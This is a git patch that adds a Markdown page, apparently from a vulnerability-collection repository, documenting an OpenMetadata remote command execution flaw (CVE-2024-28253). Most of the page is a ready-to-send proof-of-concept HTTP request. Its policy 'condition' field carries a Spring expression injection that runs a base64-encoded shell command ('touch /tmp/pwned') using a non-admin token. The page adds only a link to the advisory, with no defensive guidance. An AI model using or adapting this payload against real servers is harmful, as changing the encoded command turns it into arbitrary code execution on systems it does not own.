From 47587deb7196a46b67b79706fd1a24b4425c0c75 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 2 May 2024 14:55:16 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2024-28253).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 OpenMetadata命令执行漏洞(CVE-2024-28253).md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 OpenMetadata命令执行漏洞(CVE-2024-28253).md

diff --git a/OpenMetadata命令执行漏洞(CVE-2024-28253).md b/OpenMetadata命令执行漏洞(CVE-2024-28253).md
new file mode 100644
index 0000000..dfb238d
--- /dev/null
+++ b/OpenMetadata命令执行漏洞(CVE-2024-28253).md
@@ -0,0 +1,19 @@
+## OpenMetadata命令执行漏洞(CVE-2024-28253)
+
+
+## poc
+```
+PUT /api/v1/policies HTTP/1.1
+Host: localhost:8585
+sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
+Authorization: Bearer <non-admin JWT>
+accept: application/json
+Connection: close
+Content-Type: application/json
+Content-Length: 367
+
+{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}
+```
+
+## 漏洞来源
+- https://github.com/advisories/GHSA-7vf4-x5m2-r6gr